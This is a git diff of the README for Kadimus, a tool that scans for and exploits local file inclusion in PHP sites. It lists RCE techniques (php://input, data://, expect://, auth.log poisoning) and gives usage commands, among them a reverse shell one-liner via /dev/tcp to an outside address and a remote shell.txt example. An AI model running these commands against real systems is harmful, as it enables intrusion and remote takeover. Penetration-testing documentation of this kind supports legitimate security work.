diff --git a/README.md b/README.md index 2c0ab12..27ceca0 100644 --- a/README.md +++ b/README.md @@ -2,10 +2,10 @@ [![GitHub stars](https://img.shields.io/github/stars/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/stargazers) [![GitHub license](https://img.shields.io/github/license/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/blob/master/license.txt) -# Kadimus +# kadimus LFI Scan & Exploit Tool -- -Kadimus is a tool to check sites to lfi vulnerability , and also exploit it +kadimus is a tool to check and exploit lfi vulnerability focus on PHP systems Features: @@ -14,83 +14,21 @@ Features: - [x] /proc/self/environ RCE - [x] php://input RCE - [x] data://text RCE +- [x] expect://cmd RCE - [x] Source code disclosure -- [x] Multi thread scanner - [x] Command shell interface through HTTP Request - [x] Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://) -- [x] Proxy socks5 support for bind connections +- [x] Proxy socks5 support for remote connections ## Compile: -```sh -$ git clone https://github.com/P0cL4bs/Kadimus.git -$ cd Kadimus -``` - -You can run the configure file: +First, make sure you have all dependencies installed in your system. +Dependencies: libcurl, libopenssl, libpcre and libssh +Then you can clone the repository, to get the source code: ```sh -./configure -``` - -Or follow this steps: - -### Installing libcurl: -* CentOS/Fedora - -```sh -# yum install libcurl-devel -``` - -* Debian based - -```sh -# apt-get install libcurl4-openssl-dev -``` - -* Mac OS X based - -```sh -$ brew install openssl -``` - -### Installing libpcre: -* CentOS/Fedora - -```sh -# yum install pcre-devel -``` - -* Debian based - -```sh -# apt-get install libpcre3-dev -``` - -* Mac OS X based - -```sh -$ brew install pcre -``` - -### Installing libssh: - -* CentOS/Fedora - -```sh -# yum install libssh-devel -``` - -* Debian based - -```sh -# apt-get install libssh-dev -``` - -* Mac OS X based - -```sh -$ brew install libssh +$ git clone https://github.com/P0cL4bs/kadimus.git +$ cd kadimus ``` ### And finally: @@ -98,9 +36,11 @@ $ brew install libssh ```sh $ make ``` + ## Options: ``` +Options: -h, --help Display this help menu Request: @@ -112,9 +52,7 @@ $ make Scanner: -u, --url STRING URL to scan/exploit - -U, --url-list FILE File contains url list to scan -o, --output FILE File to save output results - -t, -threads NUMBER Number of threads (2..1000) Explotation: --parameter STRING Parameter name to inject exploit @@ -139,6 +77,7 @@ $ make input Try run PHP Code using php://input auth Try run PHP Code using /var/log/auth.log data Try run PHP Code using data://text + expect Try run a command using expect://cmd Source Disclosure: -S, --get-source Try get the source file using filter:// @@ -152,12 +91,13 @@ $ make ### Scanning: ``` ./kadimus -u localhost/?pg=contact -A my_user_agent -./kadimus -U list.txt --threads 10 --connect-timeout 10 --retry-times 0 ``` + ### Get source code of file: ``` ./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg ``` + ### Execute php code: ``` ./kadimus -u localhost/?pg=php://input%00 -C '' -T input @@ -167,12 +107,12 @@ $ make ``` ./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost ``` + ### Checking for RFI: You can also check for RFI errors, just put the remote url on resource/common_files.txt and the regex to identify this, example: - ```php /* http://bad-url.com/shell.txt */ @@ -185,5 +125,14 @@ http://bad-url.com/shell.txt?:scorpion say get over here ### Reverse shell: ``` -./kadimus -u localhost/?pg=contact.php -T data --parameter pg -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0 +./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0 ``` + +Contributing +------------ +You can help with code, or donating money. +If you wanna help with code, use the kernel code style as a reference. + +Paypal: [![](https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=RAG26EKAYHQSY¤cy_code=BRL&source=url) + +BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq